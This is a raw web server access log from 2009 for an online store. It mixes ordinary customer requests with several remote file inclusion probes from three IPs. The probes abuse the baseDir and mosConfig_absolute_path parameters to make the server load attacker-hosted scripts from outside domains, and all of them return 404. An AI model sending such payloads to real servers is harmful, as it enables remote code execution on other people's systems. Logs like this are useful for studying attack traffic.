98.195.56.213 - - [23/Sep/2009:00:25:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211328460118E0005BD7019+M37+ENG HTTP/1.1" 200 59852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211328450338E0002EA7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:26:09 -0400] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211328460118E0005BD7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:26:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211328440A88B0006977019+M37+ENG HTTP/1.1" 200 60452 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211328460118E0005BD7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.39.130.24 - - [23/Sep/2009:00:26:25 -0400] "GET /logs/access_log.Q109050800%20%20//standalone/stubjambo.php?baseDir=http://www.vistablack.com//edit/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.68.151 - - [23/Sep/2009:00:27:01 -0400] "GET /logs/error_log.Q109081300 HTTP/1.1" 200 2895374 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.152.199.34 - - [23/Sep/2009:00:28:32 -0400] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:00:28:32 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:00:28:32 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:00:28:41 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:29:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113284D0EA8B00076C7019+M37+ENG HTTP/1.1" 200 45225 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:29:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113294E05D870003467019+M37+ENG HTTP/1.1" 200 45225 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284D0EA8B00076C7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:30:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113294A0F4880004237019+M37+ENG HTTP/1.1" 200 59852 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113294E05D870003467019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:31:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211329460F38B0007DE7019+M37+ENG HTTP/1.1" 200 45225 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:31:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113294401B8500099E7019+M37+ENG HTTP/1.1" 200 45225 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211329460F38B0007DE7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
204.152.199.34 - - [23/Sep/2009:00:31:21 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:00:31:25 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:00:31:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.6.233 - - [23/Sep/2009:00:31:33 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
